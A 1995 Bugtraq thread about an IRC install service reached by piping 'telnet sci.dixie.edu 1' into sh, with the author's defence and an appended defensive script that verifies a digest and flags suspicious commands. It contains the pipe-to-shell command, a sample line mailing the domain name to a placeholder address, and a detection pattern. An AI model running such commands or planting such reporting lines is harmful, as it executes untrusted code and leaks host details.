> ---------- Forwarded message ----------
> Date: Thu, 7 Sep 1995 16:50:56 -0400
> From: Ken Weaverling <weave@hopi.dtcc.edu>
> To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
> Subject: telnet sci.dixie.edu 1
>
> If you telnet to sci.dixie.edu port 1, you get a shell script back. Obviously
> this is set up to be run as
>
> telnet sci.dixie.edu 1 | sh
>
> The script builds an executable IRC client, real nice for the novice to
> set up IRC on their own.
>
> While that alone bothers me enough, part of the script emails the author
> some *interesting* information about your system, including the
> NIS domain name.
>

Sigh... I guess I should make up an FAQ for people who keep coming up with the same concerns since the past year or two, over Usenet groups, mailing lists, etc. Anyway, let me address the issues:

* This command is dangerous - don't do it!

True. The truly paranoid should telnet sci.dixie.edu 1 > shscript and examine shscript. The truly paranoid should also examine megabytes of _any_ source code downloaded from an ftp site before compiling and running it.

How do the two relate? The service uses a secure port (<1024) for downloading the script, which means that it must run as root. ftpd also must run as root for obvious reasons. Trusting this service is equivalent to trusting that the source code on an ftp site has not been tampered with. 99% of the ftp sites don't use md5 signatures even. Not to mention that most machines out there don't even have it compiled - something that I'd dearly like to do (incorporate some kind of md5 checking). But I'm digressing...

Recently, ftp sites carrying the ircII client were compromised and a bogus copy was put up, before it was detected. A CERT notice can be found in their archives. They're also aware of this service, and had contacted dixie admins and myself to verify that the service itself hadn't been compromised.

* The command logs stuff and mails the author - bad!!
The main reason I log errors is to determine what went wrong and fix it for other platforms. I've ported this auto-source patcher to almost 15 different platforms/OS'es. I mainly log the Makefile results, and the output of some other sundry commands such as uname -a, time, hostname, domainname, etc.

Although the original poster is right about the domainname being returned, he neglected to mention _where_, _how_ and _why_ this command was being used. This command is used in conjunction with several other checks to return the closest IRC server to the site. If you check the script (telnet sci.dixie.edu 1 > filename for a copy), you'll find that the script tries to find where you're situated in the world by going through a combination of the 'hostname' (which doesn't work on many Unices :/) check, domainname check and timezone check in case the previous two fail. It then selects the appropriate server. All command outputs are logged so I _know_ what to put in on system type XXX so that it doesn't happen again. Most system services keep some sort of logs or the other.

Anyway, posts such as these prompted me to put up a disclaimer in the script to use it at your own risk. This is a _free_ service that I provide to the Internet community, and hundreds of people have benefitted from it over the years. There are a lot more vicious (and obfuscated) things a person can do if disguising backdoors in C code. The crux is, you have to trust _somebody_ _somewhere_ when downloading software from ftp sites, or installing irc using this service. Of course, the best solution is not to trust anyone and pore through the code yourself.

I do wish that Ken had at least cc'ed me a copy of this post when sending it to a list that I do not subscribe to :-( Please cc me at mmmirash@mailhost.ecn.uoknor.edu if there are followups.

Thanks
Mandar

Mandar Mirashi,              | Std. Disclaimer: All opinions expressed
Systems Support Programmer,  | belong solely to myself and in no
Engineering Computer Network | way reflect those of my employers.
University of Oklahoma (OU). | mandar@uoknor.edu, Mmmm@alias.undernet.org
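Both posts circle around the same defensive procedure: save the script to a file instead of piping it into sh, check it against a digest obtained some other way, and read through it before running it. The shell script below is an added example of that procedure; it is not code from either poster or from the dixie service. It assumes a coreutils or BSD userland (sha256sum or shasum), uses SHA-256 where the post talks about md5, and the two sample scripts, the "known good" digest and the list of command names to flag are all constructed for the example. In practice the expected digest has to come from a channel independent of the download (a signed announcement, a mirror maintainer's mail), otherwise the check only confirms the download is what the server chose to send.

```shell
#!/bin/sh
# Added example (not from the original post): fetch-to-file, verify, inspect,
# and only then run. Replaces "telnet host 1 | sh" with a guarded sequence.

# Print the SHA-256 of a file; sha256sum on GNU systems, shasum on BSD/macOS.
digest_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_script FILE EXPECTED_DIGEST
# Succeeds only if FILE exists and its digest equals EXPECTED_DIGEST.
verify_script() {
    [ -f "$1" ] || return 1
    [ "$(digest_of "$1")" = "$2" ]
}

# suspicious_lines FILE
# Print (with line numbers) lines that invoke commands a reader would want to
# look at before running a downloaded installer: anything that mails data off
# the host, reports system identity, or escalates. The pattern list is an
# illustrative assumption, not an exhaustive one.
suspicious_lines() {
    grep -nE '(^|[^a-zA-Z])(mail|sendmail|domainname|uname|hostname|su|sudo)([^a-zA-Z]|$)' "$1"
}

# run_if_verified FILE EXPECTED_DIGEST
# The guarded replacement for piping the download straight into sh.
run_if_verified() {
    if verify_script "$1" "$2"; then
        sh "$1"
    else
        echo "digest mismatch for $1, refusing to run" >&2
        return 1
    fi
}

# Constructed sample inputs standing in for what "telnet host 1 > shscript"
# would have saved. Both are temporary files removed on exit.
SUSPECT=$(mktemp)
BENIGN=$(mktemp)
trap 'rm -f "$SUSPECT" "$BENIGN"' EXIT

cat > "$SUSPECT" <<'EOF'
#!/bin/sh
echo "building irc client"
make all
domainname | mail -s "report" author@example.invalid
EOF

cat > "$BENIGN" <<'EOF'
#!/bin/sh
echo "benign install step"
EOF

# Stand-alone demonstration. The digest is computed locally here only so the
# example runs offline; a real deployment takes it from an out-of-band source.
GOOD=$(digest_of "$BENIGN")
echo "lines worth reading in the suspect script:"
suspicious_lines "$SUSPECT"
run_if_verified "$BENIGN" "$GOOD"
run_if_verified "$BENIGN" "0000000000000000000000000000000000000000000000000000000000000000" \
    || echo "tampered copy blocked as expected"
```

The digest check catches a mirror or service that has been altered since the digest was published, which is exactly the ircII case mentioned above; it does nothing against an author who ships the reporting code on purpose, which is why the inspection step remains, and why the poster's advice to read the saved copy still stands even when a digest matches.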